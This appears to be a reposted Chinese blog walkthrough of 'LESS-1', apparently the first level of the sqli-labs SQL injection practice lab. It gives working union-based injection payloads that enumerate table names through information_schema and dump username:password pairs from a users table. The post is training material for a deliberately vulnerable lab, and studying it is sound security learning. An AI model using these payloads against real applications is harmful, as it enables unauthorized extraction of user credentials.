码迷,mamicode.com
首页 > 其他好文 > 详细

LESS-1

时间:2020-01-11 18:32:52      阅读:76      评论:0      收藏:0      [点我收藏+]

标签:database   ati   img   key   table   number   payload   数据   用户数   

 爆表payload

?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

查到  emails,referers,uagents,users ,显然users是用户数据表

技术图片

 

爆列名(字段)payload

技术图片

 

 爆值payload

?id=0‘ union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:‘ ,用以分割pasword和username。技术图片

LESS-1

标签:database   ati   img   key   table   number   payload   数据   用户数   

原文地址:https://www.cnblogs.com/lql1440825777/p/12180544.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!